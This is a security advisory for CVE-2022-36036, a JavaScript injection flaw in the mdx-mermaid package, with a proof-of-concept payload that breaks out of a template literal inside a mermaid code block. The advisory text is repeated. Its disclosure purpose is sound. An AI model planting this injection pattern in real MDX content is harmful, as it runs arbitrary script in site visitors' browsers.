Headline
GHSA-rvgm-35jw-q628: Improper Control of Generation of Code ('Code Injection') in mdx-mermaid
Impact
Arbitary javascript injection
Modify any mermaid code blocks with the following code and the code inside will execute when the component is loaded by MDXjs
` + (function () {
// Put Javascript code here
return ''
}()) + `
The block below shows a valid mermaid code block
```mermaid
graph TD;
A-->B;
A-->C;
B-->D;
C-->D;
```
The same block but with the exploit added
```mermaid
` + (function () {
alert('vulnerable')
return ''
}()) + `
graph TD;
A-->B;
A-->C;
B-->D;
C-->D;
```
Patches
1.3.0 and 2.0.0-rc2
Workarounds
None known
Impact
Arbitary javascript injection
Modify any mermaid code blocks with the following code and the code inside will execute when the component is loaded by MDXjs
` + (function () {
// Put Javascript code here
return ''
}()) + `
The block below shows a valid mermaid code block
```mermaid graph TD; A–>B; A–>C; B–>D; C–>D; ```
The same block but with the exploit added
```mermaid ` + (function () { alert(‘vulnerable’) return ‘’ }()) + ` graph TD; A–>B; A–>C; B–>D; C–>D; ```
Patches
1.3.0 and 2.0.0-rc2
Workarounds
None known
References
- GHSA-rvgm-35jw-q628
- https://nvd.nist.gov/vuln/detail/CVE-2022-36036
- sjwall/mdx-mermaid@f2b9938
Related news
mdx-mermaid provides plug and play access to Mermaid in MDX. There is a potential for an arbitrary javascript injection in versions less than 1.3.0 and 2.0.0-rc1. Modify any mermaid code blocks with arbitrary code and it will execute when the component is loaded by MDXjs. This vulnerability was patched in version(s) 1.3.0 and 2.0.0-rc2. There are currently no known workarounds.